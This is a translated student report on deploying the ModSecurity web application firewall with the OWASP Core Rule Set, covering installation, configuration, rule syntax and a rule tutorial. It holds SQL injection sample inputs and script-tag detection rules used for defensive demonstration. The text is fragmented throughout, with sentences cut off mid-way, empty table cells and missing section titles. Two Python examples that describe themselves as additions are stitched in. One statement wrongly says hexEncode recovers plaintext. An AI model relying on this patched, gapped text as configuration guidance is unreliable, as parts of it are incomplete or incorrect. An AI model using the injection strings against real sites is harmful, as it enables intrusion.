TABLE OF CONTENTS
VI. INSTALLING MODSECURITY ... 12
VII. CONFIGURATION ... 15
  Directory configuration ... 15
  Configuration files ... 15
  Directives in the configuration file ... 16
  Managing the request body ... 17
  Managing the response body ... 18
  Filesystem Locations ... 18
  File Uploads ... 19
  Debug Log ... 19
  Audit Log ... 19
  Default Rule Match Policy ... 20
  Verifying Installation ... 20
VIII. OWASP MODSECURITY CORE RULE SET ... 20
  Introduction ... 20
  Deploying the OWASP ModSecurity CRS ... 21
  Checking the results ... 22
IX. OVERVIEW OF RULES ... 23
  Introduction ... 23
  Variables ... 24
    Request variables ... 25
    Server variables ... 26
    Response variables ... 26
    Miscellaneous variables ... 27
    Parsing flags ... 27
    Collections variables ... 28
    Time variables ... 28
  Operators ... 29
    String-matching operators ... 29
    Numerical operators ... 30
    Validation operators ... 30
    Miscellaneous operators ... 30
  Actions ... 31
    Disruptive actions ... 31
    Flow actions ... 31
    Metadata actions ... 32
    Variable actions ... 32
    Logging actions ... 32
    Special actions ... 33
    Miscellaneous actions ... 33
X. RULE LANGUAGE TUTORIAL ... 33
  Overview ... 33
  Using variables ... 33
  Using rule chaining (chain) ... 34
  Using the negation operator ... 34
  Variable Counting ... 35
  Guide to actions ... 35
    Action Defaults ... 35
    Unconditional Rules ... 36
    Using Transformation Functions ... 36
    Blocking ... 37
    Changing Rule Flow ... 37
    Capturing Data ... 38
    Variable Manipulation ... 39
    Metadata ... 39
XI.
  Case 1: Preventing replay attacks through a random token mechanism ... 40
  Case 2: Detecting invalid session cookies ... 43
  Case 3: Preventing HTTP Response Splitting exploitation ... 48
  Case 4: Preventing Path-Traversal exploitation ... 50
  Case 5: Detecting the risk of credit card information leakage ... 52
  Case 6: Detecting brute-force login behaviour ... 54
XII. APPENDIX ... 61
  LIST OF OWASP 2010 SECURITY VULNERABILITIES ... 61
  LIST OF TOOLS SUPPORTING WEB APPLICATION SECURITY TESTING ... 64
  REFERENCE LIST ON EXPLOITING WEB APPLICATION SECURITY VULNERABILITIES ... 67
XIII. REFERENCES ... 91
I. PROJECT ASSIGNMENT SHEET
Project title:
Lu Thanh Tr
Purpose
Traditional firewalls are not strong enough to protect web servers. ModSecurity makes it possible to protect one or more web servers through a mechanism that intervenes directly at the application level. This project aims to study ModSecurity and apply it to protect any web system.
II.
Dr. Lu Thanh Tr
INTRODUCTION
Today, web applications in enterprises and government agencies face two major challenges: reducing security risk and ensuring compliance with industry processes and/or government regulations. Fortunately, an information-security solution exists that is ready to help IT organisations meet both criteria at the same time. OWASP allows IT security specialists to reduce attacks by proactively and continuously hardening the security configuration of the OS, the web application and the Web Application Firewall. At the same time, the projects under the OWASP standard allow auditors to monitor compliance with the mandatory policies of an organisation or enterprise.
ModSecurity is a product belonging to the OWASP project that allows users to configure and customise the methods for detecting attacks on the web server. The current ModSecurity version supports Apache, Nginx and IIS. Together with the ModSecurity Core Rule Set project, deploying a WAF system becomes easier for system staff as well as security specialists.
III.
IV.
Mod_Security is an extension module for web server programs such as Apache, Nginx and IIS, and it operates as a firewall at the web application layer. As web attack methods multiply, mod_security also updates its rules and adds many countermeasures in the program's source code. Some properties that allow mod_security to be used as a Web Application Firewall:
Flexibility
In practice, analysing HTTP traffic against a given criterion runs into the problem of how to match exactly the pattern you want. In addition, because each web system has different needs, the analysis differs for each type of application. Mod_security, together with OWASP, develops sample rule sets (the Core Rule Set) to provide flexibility for different web models and to help the administrator analyse according to the actual needs of the system being administered.
Passivity
ModSecurity will not carry out any task unless the administrator assigns the program a specific job; this is quite important in an application whose role is risk analysis, as ModSecurity's is. Every alert is produced through the analysis mechanism, and the decision to act on the system is left to the administrator.
FUNCTIONS
ModSecurity, working with the web server program (for example Apache), performs the following tasks:
Parsing
ModSecurity parses the data passing through the system into data structures that ModSecurity defines in advance. These structures are then passed to the pattern-matching mechanism of the rule set for risk analysis.
Buffering
The buffer function plays a fairly important role in how ModSec operates. It means that requests sent to the web application must pass through ModSecurity before the application processes them, and responses are likewise analysed before being returned to the client. This mechanism is the only way to block attacks in real time; the data that ModSecurity receives and analyses is held in RAM (including the request body and the response data).
Logging
ModSecurity supports logging HTTP traffic: request headers, request body, response headers and response body, to help the administrator analyse the risks the system is facing so that control decisions can be made.
Rule Engine
The pattern sets in ModSecurity play an important role in detecting forms of attack and carrying out prevention. ModSecurity is also developed together with the OWASP project to build patterns for analysing and preventing attacks on web systems (see https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project).
The categories that the CRS supports:
- HTTP Protection
- Real-time Blacklist Lookups
- Web-based Malware Detection
- HTTP Denial of Service Protections
- Common Web Attacks Protection
- Automation Detection
- Integration with AV Scanning for File Uploads
- Tracking Sensitive Data
- Trojan Protection
- Identification of Application Defects
- Error Detection and Hiding
V.
- A2-Cross Site Scripting (XSS)
- A3-Broken Authentication and Session Management
- A4-Insecure Direct Object References
- A5-Cross Site Request Forgery (CSRF)
- A6-Security Misconfiguration
- A7-Insecure Cryptographic Storage
VI. INSTALLING MODSECURITY
Before you install ModSecurity on your system, you need to know the installation methods and the advantages and disadvantages of each:
Installation method | Advantages | Disadvantages
From the operating system's own version | Automatic installation; easy maintenance | May be an old version
Third-party package | Automatic installation | May be an old version; requires downloading updates frequently; the packaged installer cannot be trusted
Install from source | Guaranteed to be the latest version; experimental versions can be used; can be customised, and emergency patches can be applied when a security flaw is found | Problems may arise when the administrator wants to go back to an earlier version
In this section I will explain how to compile from source. ModSecurity can be downloaded from the website www.Modsecurity.org.
Before installing ModSecurity on Linux, you need to install the following supporting libraries: Apache Portable Runtime (APR), APR-util, the mod_unique_id module enabled in Apache, libcurl, libxml2, Lua 5.1 (optional) and PCRE.
# yum install openssl openssl-devel pcre pcre-devel libxml2 libxml2-devel curl-devel
Download the latest ModSecurity version from the product's home page.
# wget http://www.Modsecurity.org/tarball/2.7.3/Modsecurity-apache_2.7.3.tar.gz
# wget http://www.Modsecurity.org/tarball/2.7.3/Modsecurity-apache_2.7.3.tar.gz.md5
After editing httpd.conf, save it and check the configuration file to make sure Apache still works normally.
# httpd -t
Restart the httpd service on the system and, at the same time, check the log file to make sure the service is running well.
# service httpd restart
# tail -f /var/log/httpd/error_log
VII. CONFIGURATION
Directory configuration
Before configuring ModSecurity, I will create a set of directories following a predefined layout. This makes it easy for me to manage the data that ModSecurity generates, and it also helps with maintaining and updating new rules for ModSecurity.
- Binaries: /opt/modsecurity/bin
- Configuration files: /opt/modsecurity/etc
- Audit logs: /opt/modsecurity/var/audit
- Persistent data: /opt/modsecurity/var/data
- Logs: /opt/modsecurity/var/log
- Temporary files: /opt/modsecurity/var/tmp
- File uploads: /opt/modsecurity/var/upload
Location | Owner | Group | Permissions
/opt/modsecurity | root | apache | rwxr-x---
/opt/modsecurity/bin | root | apache | rwxr-x---
/opt/modsecurity/etc | root | root | rwx------
/opt/modsecurity/var | root | apache | rwxr-x---
/opt/modsecurity/var/audit | apache | root | rwx------
/opt/modsecurity/var/data | apache | root | rwx------
/opt/modsecurity/var/log | root | root | rwx------
/opt/modsecurity/var/tmp | apache | apache | rwxr-x---
/opt/modsecurity/var/upload | apache | root | rwx------
Configuration files
File | Description
main.conf | Main configuration file
rules-first.conf | Rules executed first
rules.conf |
rules-last.conf |
Description
Sets the application/x-www-form-urlencoded parameter separator
Sets the cookie parser version
Sets the folder for persistent storage
Controls request body buffering
Sets the size of the per-request memory buffer
Sets the maximum request body size ModSecurity will accept
Controls what happens once the request body limit is reached
Sets the maximum request body size, excluding uploaded files
Controls response body buffering
Specifies the response body buffering limit
Controls what happens once the response body limit is reached
Specifies a list of response body MIME types to inspect
Clears the list of response body MIME types
Controls the operation of the rule engine
Sets the folder for temporary files
#
SecDataDir /tmp/
File Uploads
In the file-upload configuration section, we need to specify the directory that holds temporary data when a file is uploaded. This directory holds the temporary file for ModSecurity to inspect before it is passed on to Apache for further processing.
Recommendation: using the upload-tracking feature can increase storage usage, because many files have duplicate content, and it also reduces ModSecurity's performance. For this reason, you should only use this feature when it is really necessary.
# The location where ModSecurity will store intercepted
# uploaded files. This location must be private to ModSecurity.
SecUploadDir /opt/modsecurity/var/upload/
# By default, do not intercept (nor store) uploaded files.
SecUploadKeepFiles Off
Debug Log
The debug log helps the administrator track ModSecurity's activity. The log level here is recommended to be set to 3, which limits the growth of the log while still allowing the system to be monitored.
# Debug log
SecDebugLog /opt/modsecurity/var/log/debug.log
SecDebugLogLevel 3
Audit Log
The audit log is used to record the transactions that take place. The audit log has three different modes that specify how it operates in ModSecurity: SecAuditEngine On (log all transactions), Off (audit logging disabled) and RelevantOnly (log only according to the pattern the user specifies).
# Log requests whose status code is 500-599 (server-side errors).
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus ^5
# Use a single file for logging.
SecAuditLogType Serial
SecAuditLog /opt/modsecurity/var/log/audit.log
# Specify the path for concurrent audit logging.
SecAuditLogStorageDir /opt/modsecurity/var/audit/
VIII. OWASP MODSECURITY CORE RULE SET
Introduction
Once ModSecurity has been installed successfully, it must be configured with rule sets in order to work as a WAF. However, writing and deploying your own rules is fairly complex, and it takes time to optimise the functions within the rules.
The Trustwave SpiderLabs research team has developed a group of rule files called the OWASP ModSecurity CRS, which covers the request contents of known attack types. A powerful feature of the CRS is that it can protect popular web applications as well as custom-developed ones.
To protect popular web applications, the CRS classifies its rule contents by attack method:
- HTTP Protection: detects risks based on the HTTP protocol, such as the method (GET, HEAD, POST) and the HTTP version (1.0, 1.1).
- Real-time Blacklist Lookups: filters dangerous IP ranges using a third party.
- Web-based Malware Detection: identifies malicious code in web page content using the Google Safe Browsing API.
Links
https://github.com/SpiderLabs/owasp-modsecurity-crs
https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master
https://github.com/SpiderLabs/owasp-modsecurity-crs/zipball/master
Figure 5: SQL injection attack after deploying the OWASP CRS
Alert recording the attack:
[Tue Jun 04 18:40:39 2013] [error] [client 192.168.149.1] ModSecurity: Access denied
with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]
{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b
?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?
i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:p. [file
"/opt/modsecurity/etc/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"]
[line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data:
order by found within ARGS:p: 1 order by 1,2,4"] [severity "CRITICAL"] [ver
"OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag
"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag
"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname
"www.modsec.com"] [uri "/"] [unique_id "Ua3SN38AAAEAAAcbBfsAAAAA"]
IX. OVERVIEW OF RULES
Introduction
ModSecurity defines 9 kinds of directive with which users can deploy flexible filtering features for their web system.
Directive | Description
SecAction | Performs an unconditional action. This directive is essentially a rule that always matches.
SecDefaultAction | Specifies the default action list, which will be used in the rules that follow.
SecMarker | Creates a marker that can be used in conjunction with the skipAfter action. A marker creates a rule that does nothing, but has an ID assigned to it.
SecRule | Creates a rule.
SecRuleInheritance | Controls whether rules are inherited in a child configuration context.
SecRuleRemoveById | Removes the rule with the given ID.
SecRuleRemoveByMsg | Removes the rule whose message matches the given regular expression.
SecRuleScript | Creates a rule implemented using Lua.
SecRuleUpdateActionById | Updates the action list of the rule with the given ID.
SecRuleUpdateTargetById | Updates the target list of the rule with the given ID.
Rule syntax in ModSecurity:
SecRule VARIABLES OPERATOR [TRANSFORMATION_FUNCTIONS, ACTIONS]
A ModSecurity rule has four components, the last two of which are optional. If a rule you define does not use the TRANSFORMATION_FUNCTIONS and ACTIONS components, ModSecurity uses the default values set in SecDefaultAction.
Variables
In ModSecurity, variables are used to extract the different components of an HTTP message. You need to be aware that the data ModSecurity works with during operation is raw bytes of data, including special characters. Although the web application you build only handles text data, you cannot be sure what is going on if adversaries use ways of getting around the logic controls.
In the current version, ModSecurity supports 77 different kinds of variable, to increase flexibility against advanced exploitation techniques.
Operators
Here ModSecurity determines how a variable is processed. Regular expressions are widely used, but ModSecurity also predefines operators to help you build rules for your own purposes.
Transformation functions
This feature converts the input data before it passes through the checking mechanism (converting upper case to lower case, decoding base64, and so on).
Actions
Specify the action to perform when a rule matches.
Variables
There are 77 kinds of variable in the current ModSecurity version, classified as follows:
- Scalar variables: hold a single piece of data, either a string or a number. For example, REMOTE_ADDR always holds the user's IP address.
- Collections: group variables together.
- Read-only collections: groups of variables that cannot be changed while ModSecurity and Apache interact.
- Read/write collections: used when you need to deploy rules that change the input data.
- Special collections: special variable groups used to extract input data in XML form.
- Persistent collections: when rules use members of this group, the data is stored in ModSecurity's internal database. Such storage is used for tasks like tracking IPs, sessions or logged-in users.
Request variables
The variables in this group are responsible for extracting values from the HTTP request headers for analysis. The value fields ModSecurity supports in these variables are collected from the URI, the method (GET, HEAD, POST, PUT) and the protocol information (HTTP 1.1, HTTP 1.0).
The following table lists the request variables that ModSecurity supports:
Variable | Description
ARGS | Request parameters (read-only collection)
ARGS_COMBINED_SIZE | Total size of all request parameters combined
ARGS_NAMES | Request parameters names (collection)
ARGS_GET | Query string parameters (read-only collection)
ARGS_GET_NAMES | Query string parameters names (read-only collection)
ARGS_POST | Request body parameters (read-only collection)
ARGS_POST_NAMES | Request body parameters names (read-only collection)
FILES | File names (read-only collection)
FILES_COMBINED_SIZE | Combined size of all uploaded files
FILES_NAMES | File parameter names (read-only collection)
FILES_SIZES | A list of file sizes (read-only collection)
FILES_TMPNAMES | A list of temporary file names (read-only collection)
PATH_INFO | Extra path information
QUERY_STRING | Request query string
REMOTE_USER | Remote user
REQUEST_BASENAME | Request URI basename
REQUEST_BODY | Request body
REQUEST_COOKIES | Request cookies (read-only collection)
REQUEST_COOKIES_NAMES | Request cookies names (read-only collection)
REQUEST_FILENAME | Request URI file name/path
REQUEST_HEADERS | Request headers (read-only collection)
REQUEST_HEADERS_NAMES | Request headers names (read-only collection)
REQUEST_LINE | Request line
REQUEST_METHOD | Request method
REQUEST_PROTOCOL | Request protocol
REQUEST_URI | Request URI, converted to exclude hostname
REQUEST_URI_RAW | Request URI, as it was presented in the request
Server variables
The variables in this group are used to analyse the elements the user sends to the server, and some others relate to the data returned to the user.
The following table lists the server variables that ModSecurity supports:
Variable | Description
AUTH_TYPE | Authentication type
REMOTE_ADDR | Remote address
REMOTE_HOST | Remote host
REMOTE_PORT | Remote port
SCRIPT_BASENAME | Script basename
SCRIPT_FILENAME | Script file name/path
SCRIPT_GID | Script group ID
SCRIPT_GROUPNAME | Script group name
SCRIPT_MODE | Script permissions
SCRIPT_UID | Script user ID
SCRIPT_USERNAME | Script user name
SERVER_ADDR | Server address
SERVER_NAME | Server name
SERVER_PORT | Server port
Response variables
The variables in this group are used to identify the data returned to the user. Most of these values are used in phase 3, Response headers (3). Some elements related to the HTTP message body are used in phase 4, Response body (4).
Description
Highest severity encountered
Contents of the last variable that matched
Contents of all variables that matched in the most recent rule
Names of all variables that matched in the most recent rule
Name of the last variable that matched
ModSecurity build version (e.g., 02050102)
Session ID associated with current transaction
Unique transaction ID generated by mod_unique_id
User ID associated with current transaction
Web application ID associated with current transaction
Error messages generated by Apache during current transaction
Parsing flags
Variable | Description
MULTIPART_BOUNDARY_QUOTED | Multipart parsing error: quoted boundary encountered
MULTIPART_BOUNDARY_WHITESPACE | Multipart parsing error: whitespace in boundary
MULTIPART_CRLF_LF_LINES | Multipart parsing error: mixed line endings used
MULTIPART_DATA_BEFORE | Multipart parsing error: seen data before first boundary
MULTIPART_DATA_AFTER | Multipart parsing error: seen data after last boundary
MULTIPART_FILE_LIMIT_EXCEEDED | Multipart parsing error: too many files
MULTIPART_HEADER_FOLDING | Multipart parsing error: header folding used
MULTIPART_INVALID_HEADER_FOLDING | Multipart parsing error: invalid header folding encountered
MULTIPART_LF_LINE | Multipart parsing error: LF line ending detected
MULTIPART_MISSING_SEMICOLON | Multipart parsing error: missing semicolon before boundary
MULTIPART_STRICT_ERROR | At least one multipart error except unmatched boundary occurred
MULTIPART_UNMATCHED_BOUNDARY | Multipart parsing error: unmatched boundary detected
REQBODY_PROCESSOR | Request processor that handled request body
REQBODY_PROCESSOR_ERROR | Request processor error flag (0 or 1)
REQBODY_PROCESSOR_ERROR_MSG | Request processor error message
Collections variables
The variables in this group can contain variables from other groups, in order to collect data to feed into ModSecurity's behaviour-analysis mechanism.
Variable | Description
ENV | Environment variables (read-only collection, although it is possible to use setvar to change it)
GEO | Geo lookup information from the last @geoLookup invocation (read-only collection)
GLOBAL | Global information, shared by all processes (read/write collection)
IP | IP address data storage (read/write collection)
TX | Transient transaction data (read/write collection)
RULE | Current rule metadata (read-only collection)
SESSION | Session data storage (read/write collection)
USER |
XML |
Time variables
The time variables identify the time at which a ModSecurity transaction takes place.
Variable | Description
TIME | Time (HH:MM:SS)
TIME_DAY | Day of the month (1-31)
TIME_EPOCH | Seconds since January 1, 1970 (e.g., 1251029017)
TIME_HOUR | Hour of the day (0-23)
TIME_MIN | Minute of the hour (0-59)
TIME_MON | Month of the year (0-11)
TIME_SEC | Second of the minute (0-59)
TIME_WDAY | Week day (0-6)
TIME_YEAR | Year
Operators
The test operators in ModSecurity analyse the input variables (Variables) in order to reach a decision. Most rules use regular expressions for analysis, but in some specific cases the other operator groups are more useful.
Consider the case where numeric values have to be compared: using a regular expression is quite disadvantageous, both for writing the rule and for the resources consumed when the comparison runs. ModSecurity supports a group of different comparison methods to improve the performance of the check. In this case, using arithmetic operators is far more efficient than a regular expression.
ModSecurity supports 4 groups:
- String-matching operators
- Numerical operators
- Validation operators
- Miscellaneous operators
String-matching operators
String-matching operators are used to analyse the input data coming from variables. The @rx and @pm operators are used most often in analysis rules, because of the flexibility of @rx and the processing speed of @pm. In other cases, the remaining operators help you develop rules for more specific purposes.
Operator | Description
@beginsWith | Input begins with parameter
@contains | Input contains parameter
@endsWith |
@rsub |
@rx |
@pm |
@pmFromFile (also @pmf as of 2.6) |
@streq |
@within |
Numerical operators
The table below lists the operators that support comparing numeric values. In ModSecurity versions before 2.5.12, numeric comparison had to go through regular expressions, which had a large impact on server performance.
Operator | Description
@eq | Equal
@ge | Greater or equal
@gt | Greater than
@le | Less or equal
@lt | Less than
Validation operators
The validation operators that ModSecurity supports are listed in the following table:
Operator | Description
@validateByteRange | Validates that parameter consists only of allowed byte values
@validateDTD | Validates XML payload against a DTD
@validateSchema | Validates XML payload against a schema
@validateUrlEncoding | Validates an URL-encoded string
@validateUtf8Encoding | Validates an UTF-8-encoded string
Miscellaneous operators
The last group of operators that ModSecurity supports lets you create rules with some very useful filtering functions, such as detecting credit card leakage (@verifyCC), checking the geographic region of the user's IP (@geoLookup) and checking for leakage of social security numbers (@verifySSN).
Operator | Description
@geoLookup | Determines the physical location of an IP address
@inspectFile | Invokes an external script to inspect a file
@rbl | Looks up the parameter against a RBL (real-time block list)
@verifyCC |
@verifyCPF |
@verifySSN |
@ipMatch |
@ipMatchFromFile (and @ipMatchF), as of 2.7.0 |
Actions
Actions are ModSecurity's strength: they give the web system immunity to some known kinds of exploitation. Actions are the last component of a rule; through them Apache decides the result returned to the user (an error message, dropping the connection, or allowing access).
ModSecurity divides actions into 7 categories:
- Disruptive actions
- Flow actions
- Metadata actions
- Variable actions
- Logging actions
- Special actions
- Miscellaneous actions
Disruptive actions
In this group, actions are used to block or redirect the connection when ModSecurity detects a matching attack pattern.
Action | Description
allow | Stop processing of one or more remaining phases
block | Indicate that a rule wants to block
deny | Block transaction with an error page
drop | Close network connection
pass | Do not block, go to the next rule
pause | Pause for a period of time, then execute allow.
proxy | Proxy request to a backend web server
redirect | Redirect request to some other web server
Flow actions
Action | Description
chain | Connect two or more rules into a single logical rule
skip | Skip over one or more rules that follow
skipAfter | Skip after the rule or marker with the provided ID
Metadata actions
This group lets you define descriptive information about a rule. This information is usually used to describe the error message, explain the cause of the error, or suggest a remedy.
Action | Description
id | Assign unique ID to a rule
phase | Phase for a rule to run in
msg | Message string
rev | Revision number
severity | Severity
tag | Tag
Variable actions
The actions in this group relate to variable values (Variables); they let you set, change and remove the values that variables store.
Action | Description
capture | Capture results into one or more variables
deprecatevar | Decrease numerical variable value over time
expirevar | Remove variable after a time period
initcol | Create a new persistent collection
setenv | Set or remove an environment variable
setvar | Set, remove, increment, or decrement a variable
setuid | Associate current transaction with an application user ID (username)
setsid | Associate current transaction with an application session ID
Logging actions
The actions in the logging group tell ModSecurity how and where to store logs. The actions that affect logging in a rule are auditlog, log, noauditlog and nolog. To control the logging process, refer to the ctl action.
Action | Description
auditlog | Log current transaction to audit log
log | Log error message; implies auditlog
logdata |
noauditlog |
nolog |
sanitiseArg |
sanitiseMatched |
sanitiseRequestHeader |
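What the logging and metadata actions contribute (id, msg, severity, tag, and the "Matched Data" that logdata carries) ends up in the alert line that the SQL injection test in section VIII showed in the Apache error log. The Python below is an added example, not code from this report: it parses such lines for triage, its two sample lines are constructed after that alert (with the regex shortened), and it assumes the Apache 2.2 "[client ip]" prefix the report shows.

```python
"""Parse ModSecurity 2.x alerts from the Apache error log (added example, not
code from the report). Input shape is the alert quoted in section VIII: an
Apache 2.2 error-log prefix "[time] [level] [client ip]", the ModSecurity
message, then a run of [key "value"] fields filled in by the CRS rules."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample lines: the first mirrors the report's SQLi alert with the
# regex shortened; the second shows the same rule in DetectionOnly mode, where
# ModSecurity logs "Warning." instead of "Access denied".
SAMPLE_LINES = [
    r'[Tue Jun 04 18:40:39 2013] [error] [client 192.168.149.1] ModSecurity: '
    r'Access denied with code 403 (phase 2). Pattern match "\\b(?i:having)\\b" at ARGS:p. '
    r'[file "/opt/modsecurity/etc/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] '
    r'[line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] '
    r'[data "Matched Data: order by found within ARGS:p: 1 order by 1,2,4"] '
    r'[severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] '
    r'[tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [hostname "www.modsec.com"] [uri "/"] '
    r'[unique_id "Ua3SN38AAAEAAAcbBfsAAAAA"]',
    r'[Tue Jun 04 18:41:02 2013] [error] [client 192.168.149.1] ModSecurity: '
    r'Warning. Pattern match "\\b(?i:having)\\b" at ARGS:p. '
    r'[file "/opt/modsecurity/etc/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] '
    r'[line "130"] [id "959070"] [msg "SQL Injection Attack"] [severity "CRITICAL"] '
    r'[tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.modsec.com"] [uri "/search"] '
    r'[unique_id "Ua3SN38AAAEAAAcbBfsAAAAB"]',
]

PREFIX_RE = re.compile(r'^\[(?P<time>[^\]]+)\] \[(?P<level>[^\]]+)\] '
                       r'\[client (?P<client>[^\]]+)\] ModSecurity: (?P<rest>.*)$')
FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')   # [key "value"], value may contain \"
DENY_RE = re.compile(r'^Access denied with code (\d{3}) \(phase (\d)\)')


@dataclass
class Alert:
    time: str
    client: str
    blocked: bool                 # True for "Access denied", False for "Warning."
    status: Optional[int]         # HTTP status used to block; None when only warning
    phase: Optional[int]
    message: str                  # free text before the first [key "value"] field
    fields: Dict[str, str] = field(default_factory=dict)
    tags: List[str] = field(default_factory=list)

    @property
    def rule_id(self) -> str:
        return self.fields.get("id", "")


def parse_alert(line: str) -> Optional[Alert]:
    """Return an Alert for a ModSecurity line, None for any other error-log line."""
    m = PREFIX_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    found = list(FIELD_RE.finditer(rest))
    message = (rest[: found[0].start()] if found else rest).strip()
    fields: Dict[str, str] = {}
    tags: List[str] = []
    for fm in found:
        key, value = fm.group(1), fm.group(2).replace('\\"', '"')
        if key == "tag":          # the only field that repeats
            tags.append(value)
        else:
            fields[key] = value
    deny = DENY_RE.match(message)
    return Alert(
        time=m.group("time"), client=m.group("client"),
        blocked=deny is not None,
        status=int(deny.group(1)) if deny else None,
        phase=int(deny.group(2)) if deny else None,
        message=message, fields=fields, tags=tags,
    )


def summarize(lines):
    """Alerts plus a (client, rule id) counter and how many were actually blocked."""
    alerts = [a for a in map(parse_alert, lines) if a is not None]
    per_source = Counter((a.client, a.rule_id) for a in alerts)
    blocked = sum(1 for a in alerts if a.blocked)
    return alerts, per_source, blocked
```

A "Warning." alert with the same rule id as an "Access denied" one is the usual sign that SecRuleEngine is DetectionOnly on one host and On on another.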
Special actions
Action | Description
ctl | Change configuration of current transaction
multiMatch | Activate multi-matching, where an operator runs after every transformation
t | Specify transformation functions to apply to variables before matching
Miscellaneous actions
Action | Description
append | Append content to response body
exec | Execute external script
prepend | Prepend content to response body
status | Specify response status code to use with deny and redirect
xmlns | Specify name space for use with XPath expressions
X. RULE LANGUAGE TUTORIAL
Overview
In this guide I will start with a simple rule consisting of one variable and one string:
SecRule REQUEST_URI <script>
With this expression, ModSecurity inspects the request URI sent by the client and determines whether the string <script> is present. You can, however, add an explicit operator to the rule to make the check more effective; I will rewrite the rule as follows:
SecRule REQUEST_URI "@rx <script>"
ModSecurity supports many different operators. Some have the same function, but they affect system performance differently. In my example the string <script> is not really a regular expression, because it contains no special characters to
SecRule ARGS K1
When ModSecurity runs, the rule above is interpreted as:
SecRule ARGS K1 phase:2,log,auditlog,pass
In this way ModSecurity lets you deploy rules more easily, without having to repeat the same action list on every rule:
SecDefaultAction phase:2,log,deny,status:404
SecRule ARGS K1
SecRule ARGS K2
...
SecRule ARGS K99
Unconditional Rules
The actions you set in a SecRule directive run only when the expression matches, but you can also use the SecAction directive to run a predefined action list unconditionally. SecAction takes exactly one parameter, which corresponds to the third (action) part of a SecRule directive.
SecAction nolog,pass,setvar:tx.counter=10
Using Transformation Functions
When exploiting web application vulnerabilities, attackers commonly obfuscate their data to get past inspection. To counter obfuscation, ModSecurity can transform input data before checking it for attacks. For example:
In a SQL injection attack the attacker sends the query id=1&UniON%20SeLeCT%201,2,3,4,5,6 (in this case we need to convert the characters to lowercase before checking).
Or, in the rule below, ModSecurity converts the characters to lowercase and also removes unnecessary whitespace:
SecRule ARGS "@contains delete from" \
phase:2,t:lowercase,t:compressWhitespace,block
As a result, ModSecurity filters keywords in all of the following forms:
delete from
DELETE FROM
deLeTe fRoM
Delete From
DELETE\tFROM
Some reasons to use transformation functions:
For exploits that use base64 encoding, we can apply t:base64Decode to decode the input data.
Similarly, when the attacker converts the data to hex, t:hexEncode should be used to convert it back to plaintext.
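To make the effect of transformation functions concrete, here is an added Python model (not code from the original document or from ModSecurity itself) of how the transformations named in a rule's action list are applied in order before the @contains operator runs. The function names are my own; the transformation names in the TRANSFORMS table (lowercase, compressWhitespace, base64Decode, hexDecode) are real ModSecurity transformations, with hexDecode being the one that turns hex back into plaintext.

```python
import base64
import binascii
import re

# Added example: a minimal model of ModSecurity's transformation pipeline.
# Function names are hypothetical; the keys of TRANSFORMS are real
# ModSecurity transformation names.

def t_lowercase(value: str) -> str:
    return value.lower()

def t_compress_whitespace(value: str) -> str:
    # Collapse every run of whitespace (space, tab, newline) into one space.
    return re.sub(r"\s+", " ", value)

def t_base64_decode(value: str) -> str:
    # Only rewrite the value when it really is base64; otherwise pass it through.
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return value

def t_hex_decode(value: str) -> str:
    try:
        return bytes.fromhex(value).decode("utf-8", "replace")
    except ValueError:
        return value

TRANSFORMS = {
    "lowercase": t_lowercase,
    "compressWhitespace": t_compress_whitespace,
    "base64Decode": t_base64_decode,
    "hexDecode": t_hex_decode,
}

def apply_transforms(value: str, names) -> str:
    """Apply the named transformations in order, as t:a,t:b does in a rule."""
    for name in names:
        value = TRANSFORMS[name](value)
    return value

def contains_after_transforms(value: str, needle: str, names) -> bool:
    """Model of: SecRule ARGS "@contains <needle>" "t:<names>..." """
    return needle in apply_transforms(value, names)

# Constructed sample input: the five spellings listed above plus a benign query.
PAGE_VARIANTS = ["delete from", "DELETE FROM", "deLeTe fRoM", "Delete From", "DELETE\tFROM"]
BENIGN = "select name from users"

if __name__ == "__main__":
    rule_transforms = ["lowercase", "compressWhitespace"]
    for v in PAGE_VARIANTS + [BENIGN]:
        hit = contains_after_transforms(v, "delete from", rule_transforms)
        print(f"{v!r:25} -> match={hit}")
```

Without compressWhitespace the tab-separated spelling slips through even after lowercasing, which is why the rule on the page lists both transformations; the decoders show the same idea for base64 and hex-encoded input.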
Blocking
Each rule directive in ModSecurity (or a SecAction directive) is tied to exactly one disruptive action that handles the result of the preceding analysis. ModSecurity supports three states for blocking attacks:

"phase:1,auditlog,id:10000,nolog,pass,capture,setsid:%{TX.1}"
[4] Transformation completed in 7 usec.
[4] Executing operator "rx" with param "^/([0-9a-fA-f]{16})/" against REQUEST_URI.
[9] Target value: "/69d032331009e7b0/index.html"
[9] Added regex subexpression to TX.0: /69d032331009e7b0/
[9] Added regex subexpression to TX.1: 69d032331009e7b0
[4] Operator completed in 58 usec.
